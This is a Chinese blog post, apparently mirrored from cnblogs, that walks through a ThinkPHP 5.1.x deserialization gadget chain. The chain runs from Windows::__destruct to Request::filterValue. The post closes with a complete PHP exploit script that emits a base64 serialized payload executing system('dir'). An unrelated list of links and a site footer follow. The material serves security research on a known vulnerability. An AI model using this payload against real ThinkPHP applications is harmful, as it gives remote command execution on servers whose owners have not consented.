zoukankan      html  css  js  c++  java

  • thinkphp 5.1.x pop链

    ThinkPHP5.1.X反序列化利用链

    thinkprocesspipesWindows->__destruct()

    入口点:thinkphp/library/think/process/pipes/Windows.php

    public function __destruct()
{
    $this->close();
    $this->removeFiles();
}
private function removeFiles()
{
    foreach ($this->files as $filename) {
        if (file_exists($filename)) {
            @unlink($filename);
        }
    }
    $this->files = [];
}

    精髓的地方是file_exists会触发__toString()

    thinkmodelconcernConversion->__toString()

    一直到toArray()

    if (!$relation) {
    $relation = $this->getAttr($key)
    if ($relation) {
        $relation->visible($name);
    }
}

    $relation传入Request类,触发__call()

    thinkRequest->__call()

    public function __call($method, $args)#method="visible"&args=[["dir"]]
{#hook = ["visible"=>[$this,"isAjax"]]
    if (array_key_exists($method, $this->hook)) {
        array_unshift($args, $this);#args=[$this,["dir"]]
        return call_user_func_array($this->hook[$method], $args);
    }

    throw new Exception('method not exists:' . static::class . '->' . $method);
}

    call_user_func_arraythinkRequest->isAjax()或者isPjax

    public function isAjax($ajax = false)#ajax=$this,["dir"]
{
    $value  = $this->server('HTTP_X_REQUESTED_WITH');
    $result = 'xmlhttprequest' == strtolower($value) ? true : false;

    if (true === $ajax) {
        return $result;
    }
    #$this->config = ["var_ajax"=>'lin']
    $result           = $this->param($this->config['var_ajax']) ? true : $result;
    $this->mergeParam = false;
    return $result;
}

    进入param()一路走到最后的input()

    if (is_array($data)) {
    array_walk_recursive($data, [$this, 'filterValue'], $filter);
    if (version_compare(PHP_VERSION, '7.1.0', '<')) {
        // 恢复PHP版本低于 7.1 时 array_walk_recursive 中消耗的内部指针
        $this->arrayReset($data);
    }
} else {
    $this->filterValue($data, $name, $filter);
}

    再进filterValue,最后

    if (is_callable($filter)) {
    // 调用函数或者方法过滤
    $value = call_user_func($filter, $value);
}

    exp

    <?php
namespace think;
abstract class Model{
    protected $append;
    private $data;
    function __construct(){
        $this->append = ["sy1j"=>["whatever"]];
        $this->data = ["sy1j"=>new Request()];
    }
}
class Request
{
    protected $hook;
    protected $filter;
    protected $config;
    protected $param;
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>'sy1j'];
        $this->hook = ["visible"=>[$this,"isAjax"]];
        $this->param = ['sy1j'=>'dir'];
    }
}


namespace thinkprocesspipes;

use thinkmodelconcernConversion;
use thinkmodelPivot;
class Windows
{
    private $files;

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}

namespace thinkmodel;

use thinkModel;

class Pivot extends Model
{
}
use thinkprocesspipesWindows;
echo base64_encode(serialize(new Windows()));
?>
  • 相关阅读:
    DNS解析的并发性
    Pycharm(Jetbrains IDE)Debian buster Navigate Back/Forward (Ctrl+Alt+Left/Right)不好使的解决方法
    Linux命令行登录时的提示信息
    cmake编译Qt5
    cmake使用ccache
    bash 脚本所在文件夹
    gnome desktop
    gnome caps lock 和 num lock 键状态
    oracle 日期、月份处理
    独夜行
  • 原文地址:https://www.cnblogs.com/20175211lyz/p/13637323.html
Copyright © 2011-2022 走看看